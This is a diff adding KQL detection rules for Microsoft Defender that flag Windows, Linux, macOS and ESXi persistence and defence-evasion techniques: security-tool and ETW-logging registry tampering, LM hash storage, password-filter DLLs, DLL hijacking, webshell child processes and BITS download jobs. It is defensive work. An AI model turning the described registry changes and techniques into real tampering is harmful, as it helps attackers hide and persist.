CrimpSec +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD")) \ No newline at end of file diff --git a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql new file mode 100644 index 00000000..e05e5ac6 --- /dev/null +++ b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql @@ -0,0 +1,10 @@ +// Title: Disable Windows Security Center Notifications +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience" \ No newline at end of file diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql new file mode 100644 index 00000000..dab5469d --- /dev/null +++ b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql @@ -0,0 +1,12 @@ +// Title: DLL Search Order Hijackig Via Additional Space in Path +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-30 +// Level: high +// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) +but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 + +DeviceFileEvents +| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\") \ No newline at end of file diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql new file mode 100644 index 00000000..eac11d71 --- /dev/null +++ b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql @@ -0,0 +1,15 @@ +// Title: DNS-over-HTTPS Enabled by Registry +// Author: Austin Songer +// Date: 2021-07-22 +// Level: medium +// Description: Detects when a user enables DNS-over-HTTPS. +This can be used to hide internet activity or be used to hide the process of exfiltrating data. +With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled") \ No newline at end of file diff --git a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql new file mode 100644 index 00000000..9ab99016 --- /dev/null +++ b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql @@ -0,0 +1,10 @@ +// Title: Dropping Of Password Filter DLL +// Author: Sreeman +// Date: 2020-10-29 +// Level: medium +// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002 + +DeviceProcessEvents +| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add" \ No newline at end of file diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/Persistence/enable_lm_hash_storage.kql new file mode 100644 index 00000000..ebf62ff6 --- /dev/null +++ b/KQL/rules/Persistence/enable_lm_hash_storage.kql @@ -0,0 +1,12 @@ +// Title: Enable LM Hash Storage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-15 +// Level: high +// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. +By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash" \ No newline at end of file diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql new file mode 100644 index 00000000..798ffe5e --- /dev/null +++ b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql @@ -0,0 +1,12 @@ +// Title: Enable LM Hash Storage - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-15 +// Level: high +// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. +By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql new file mode 100644 index 00000000..cae96f9e --- /dev/null +++ b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql @@ -0,0 +1,10 @@ +// Title: Enabling COR Profiler Environment Variables +// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) +// Date: 2020-09-10 +// Level: medium +// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH" \ No newline at end of file diff --git a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql new file mode 100644 index 00000000..0199040b --- /dev/null +++ b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi Account Creation Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-08-22 +// Level: medium +// Description: Detects user account creation on ESXi system via esxcli +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "system " and ProcessCommandLine contains "account " and ProcessCommandLine contains "add ") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql new file mode 100644 index 00000000..e858882a --- /dev/null +++ b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi Admin Permission Assigned To Account Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-04 +// Level: high +// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "system" and (ProcessCommandLine contains " permission " and ProcessCommandLine contains " set" and ProcessCommandLine contains "Admin") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql new file mode 100644 index 00000000..bb458995 --- /dev/null +++ b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql @@ -0,0 +1,10 @@ +// Title: ETW Logging Disabled For rpcrt4.dll +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-09 +// Level: low +// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 + +DeviceRegistryEvents +| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation" \ No newline at end of file diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql new file mode 100644 index 00000000..646cb83c --- /dev/null +++ b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql @@ -0,0 +1,10 @@ +// Title: ETW Logging Disabled For SCM +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-09 +// Level: low +// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled" \ No newline at end of file diff --git a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql new file mode 100644 index 00000000..11f646b7 --- /dev/null +++ b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql @@ -0,0 +1,10 @@ +// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-06-05 +// Level: high +// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 + +DeviceRegistryEvents +| where ((RegistryValueData in~ ("0", "DWORD (0x00000000)")) and (RegistryKey endswith "\\COMPlus_ETWEnabled" or RegistryKey endswith "\\COMPlus_ETWFlags")) or (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled") \ No newline at end of file diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql new file mode 100644 index 00000000..540adb33 --- /dev/null +++ b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql @@ -0,0 +1,15 @@ +// Title: HackTool - Powerup Write Hijack DLL +// Author: Subhash Popuri (@pbssubhash) +// Date: 2021-08-21 +// Level: high +// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. +In it's default mode, it builds a self deleting .bat file which executes malicious command. +The detection rule relies on creation of the malicious bat file (debug.bat by default). + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Any powershell script that creates bat files + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat" \ No newline at end of file diff --git a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql new file mode 100644 index 00000000..95869e63 --- /dev/null +++ b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - SharpUp PrivEsc Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-20 +// Level: critical +// Description: Detects the use of SharpUp, a tool for local privilege escalation +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005 + +DeviceProcessEvents +| where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword") \ No newline at end of file diff --git a/KQL/rules/Persistence/ie_change_domain_zone.kql b/KQL/rules/Persistence/ie_change_domain_zone.kql new file mode 100644 index 00000000..e86cf1a3 --- /dev/null +++ b/KQL/rules/Persistence/ie_change_domain_zone.kql @@ -0,0 +1,12 @@ +// Title: IE Change Domain Zone +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Hides the file extension through modification of the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative scripts + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains*" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql new file mode 100644 index 00000000..d0a062eb --- /dev/null +++ b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql @@ -0,0 +1,12 @@ +// Title: IIS Native-Code Module Command Line Installation +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-11 +// Level: medium +// Description: Detects suspicious IIS native-code module installations via command line +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 +// False Positives: +// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules + +DeviceProcessEvents +| where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:" or ProcessCommandLine contains "–name:" or ProcessCommandLine contains "—name:" or ProcessCommandLine contains "―name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql new file mode 100644 index 00000000..d4244714 --- /dev/null +++ b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql @@ -0,0 +1,13 @@ +// Title: Imports Registry Key From a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects the import of the specified file to the registry with regedit.exe. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate import of keys +// - Evernote + +DeviceProcessEvents +| where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and ProcessCommandLine matches regex ":[^ \\\\]"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql new file mode 100644 index 00000000..dedf9ed8 --- /dev/null +++ b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql @@ -0,0 +1,10 @@ +// Title: Imports Registry Key From an ADS +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the import of a alternate datastream to the registry with regedit.exe. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion + +DeviceProcessEvents +| where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c "))) \ No newline at end of file diff --git a/KQL/rules/Persistence/interactive_at_job.kql b/KQL/rules/Persistence/interactive_at_job.kql new file mode 100644 index 00000000..ac88ff8a --- /dev/null +++ b/KQL/rules/Persistence/interactive_at_job.kql @@ -0,0 +1,12 @@ +// Title: Interactive AT Job +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detects an interactive AT job, which may be used as a form of privilege escalation. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002 +// False Positives: +// - Unlikely (at.exe deprecated as of Windows 8) + +DeviceProcessEvents +| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/linux_webshell_indicators.kql b/KQL/rules/Persistence/linux_webshell_indicators.kql new file mode 100644 index 00000000..9fe9b890 --- /dev/null +++ b/KQL/rules/Persistence/linux_webshell_indicators.kql @@ -0,0 +1,12 @@ +// Title: Linux Webshell Indicators +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-10-15 +// Level: high +// Description: Detects suspicious sub processes of web server processes +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 +// False Positives: +// - Web applications that invoke Linux command line tools + +DeviceProcessEvents +| where ((InitiatingProcessFolderPath endswith "/httpd" or InitiatingProcessFolderPath endswith "/lighttpd" or InitiatingProcessFolderPath endswith "/nginx" or InitiatingProcessFolderPath endswith "/apache2" or InitiatingProcessFolderPath endswith "/node" or InitiatingProcessFolderPath endswith "/caddy") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "tomcat") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "websphere")) and (FolderPath endswith "/whoami" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/bin/uname" or FolderPath endswith "/bin/cat" or FolderPath endswith "/bin/crontab" or FolderPath endswith "/hostname" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/pwd" or FolderPath endswith "/route") \ No newline at end of file diff --git a/KQL/rules/Persistence/macos_emond_launch_daemon.kql b/KQL/rules/Persistence/macos_emond_launch_daemon.kql new file mode 100644 index 00000000..1d6c7e08 --- /dev/null +++ b/KQL/rules/Persistence/macos_emond_launch_daemon.kql @@ -0,0 +1,12 @@ +// Title: MacOS Emond Launch Daemon +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-23 +// Level: medium +// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014 +// False Positives: +// - Legitimate administration activities + +DeviceFileEvents +| where (FolderPath contains "/etc/emond.d/rules/" and FolderPath endswith ".plist") or FolderPath contains "/private/var/db/emondClients/" \ No newline at end of file diff --git a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql new file mode 100644 index 00000000..7ed68386 --- /dev/null +++ b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql @@ -0,0 +1,12 @@ +// Title: Macro Enabled In A Potentially Suspicious Document +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql new file mode 100644 index 00000000..1bd9aa24 --- /dev/null +++ b/KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql @@ -0,0 +1,12 @@ +// Title: Malicious DLL File Dropped in the Teams or OneDrive Folder +// Author: frack113 +// Date: 2022-08-12 +// Level: high +// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications +Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 + +DeviceFileEvents +| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft" \ No newline at end of file diff --git a/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql new file mode 100644 index 00000000..dc78d7b3 --- /dev/null +++ b/KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql @@ -0,0 +1,15 @@ +// Title: Mask System Power Settings Via Systemctl +// Author: Milad Cheraghi, Nasreddine Bencherchali +// Date: 2025-10-17 +// Level: high +// Description: Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. +Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted. +This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.impact, attack.t1653 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "suspend.target" or ProcessCommandLine contains "hibernate.target" or ProcessCommandLine contains "hybrid-sleep.target") and (ProcessCommandLine contains " mask" and FolderPath endswith "/systemctl") \ No newline at end of file diff --git a/KQL/rules/Persistence/modification_of_ie_registry_settings.kql b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql new file mode 100644 index 00000000..911580fd --- /dev/null +++ b/KQL/rules/Persistence/modification_of_ie_registry_settings.kql @@ -0,0 +1,10 @@ +// Title: Modification of IE Registry Settings +// Author: frack113 +// Date: 2022-01-22 +// Level: low +// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or isnull(RegistryValueData) or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision")))) and (not(RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents")) \ No newline at end of file diff --git a/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql new file mode 100644 index 00000000..d94ff684 --- /dev/null +++ b/KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql @@ -0,0 +1,10 @@ +// Title: Modify User Shell Folders Startup Value +// Author: frack113 +// Date: 2022-10-01 +// Level: high +// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.001 + +DeviceRegistryEvents +| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup" \ No newline at end of file diff --git a/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql new file mode 100644 index 00000000..d84ce3f5 --- /dev/null +++ b/KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql @@ -0,0 +1,14 @@ +// Title: Monitoring For Persistence Via BITS +// Author: Sreeman +// Date: 2020-10-29 +// Level: medium +// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. +When the job runs on the system the command specified in the BITS job will be executed. +This can be abused by actors to create a backdoor within the system and for persistence. +It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1197 + +DeviceProcessEvents +| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/msexchange_transport_agent_installation.kql b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql new file mode 100644 index 00000000..021db9d8 --- /dev/null +++ b/KQL/rules/Persistence/msexchange_transport_agent_installation.kql @@ -0,0 +1,12 @@ +// Title: MSExchange Transport Agent Installation +// Author: Tobias Michalski (Nextron Systems) +// Date: 2021-06-08 +// Level: medium +// Description: Detects the Installation of a Exchange Transport Agent +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.002 +// False Positives: +// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. + +DeviceProcessEvents +| where ProcessCommandLine contains "Install-TransportAgent" \ No newline at end of file diff --git a/KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql 